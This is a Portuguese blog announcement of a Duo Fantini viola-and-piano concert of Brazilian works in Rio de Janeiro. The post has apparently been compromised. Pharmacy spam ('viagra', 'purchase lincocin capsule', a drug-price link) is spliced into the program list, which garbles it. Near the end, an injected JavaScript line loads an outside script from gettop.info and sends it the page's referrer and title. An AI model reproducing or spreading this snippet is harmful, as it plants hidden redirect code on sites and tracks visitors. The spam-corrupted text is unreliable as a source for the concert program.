Música de câmaraProgramaçãoRio de Janeiro

Piano e viola em repertório 100% brasileiro

Duo Fantini interpreta Villa-Lobos, Guerra-Peixe e Carlos Gomes em concerto no próximo dia 22 de fevereiro.

 

Heitor Villa-Lobos, César Guerra-Peixe, Carlos Gomes e Radamés Gnatalli são alguns dos compositores cujas obras integram o repertório 100% nacional do concerto que o Buy Duo Fantini promove no próximo dia 22 de fevereiro, domingo, às 11h, no Centro de Referência da Música Carioca, na Tijuca, no Rio de Janeiro.

O Duo Fantini é formado pelos irmãos cariocas Bernardo (viola) e Luciana Fantini (piano), e tem como objetivo principal divulgar a produção de música brasileira de concerto para essa formação. Bernardo é bacharel em viola pela UniRio e já integrou, como primeiro violista, grupos como OSB Jovem, Orquestra da UniRio, OSB Ópera e Repertório, e Orquestra do Conservatório Brasileiro de Música, além de desenvolver trabalho na música de Câmara com a Orquestra de Solistas do Rio de Janeiro e participar da banda da cantora Marisa Monte em sua última turnê, Verdade uma ilusão. Luciana é mestre em Música pela Escola de Música da UFRJ e pós-graduada em Pedagogia do Piano pelo Conservatório Brasileiro de Música. Foi vencedora do III e do IV Concurso Nacional Jovem Destaque (2009 / 2010), realizados no Rio de Janeiro, além de ter sido premiada em duas edições do Concurso Latino americano Rosa Mística (2008 e 2011), em Curitiba e no XXI Concurso de PianoArtlivre, em São Paulo (2008).

O programa do concerto é composto pelas seguintes peças: Laudamus (Pe. José Maurício Nunes Garcia), Romanza (C. Gomes), Bachianas n. 5 Purchase Order http://www.lorenzobistro.com.br/2018/02/advair-cost-cvs/ (H. Villa Lobos), Três Peças para Viola e Piano e Order Ponteado de Viola / Tangendo (Guerra-Peixe), Purchase Sonata (R. Gnatalli) e pharmacy in singaporeviagra Interlúdio purchase lincocin capsule V (Villani-Côrtes). Os ingressos custam R$ 20 (inteira).

 

Serviço:

Duo Fanini – viola e piano

Dia 22 de fevereiro, domingo, às 11h

Centro Musical de Referência da Musica Carioca Artur da Távola (R. Conde de Bonfim, 824, Tijuca, Rio de Janeiro)

Telefone: (21) 3238-3831

Capacidade: 40 lugares

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.